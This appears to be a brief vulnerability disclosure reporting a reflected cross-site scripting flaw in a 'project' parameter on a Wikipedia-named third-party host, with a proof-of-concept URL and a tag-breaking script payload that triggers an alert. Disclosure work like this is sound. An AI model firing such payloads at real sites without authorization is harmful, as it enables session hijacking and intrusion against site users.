Greetings, I found an XSS on one of the Wikipedia server endpoints.
the attacker could run javascript on the victim's account right after the authentication process.
POC Steps:
1 - Open the url http://wikipedia.ramselehof.de/wawewewi.php?project=
2 - send a javascript payload after the equals sign, and then the alert will fire
("></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>)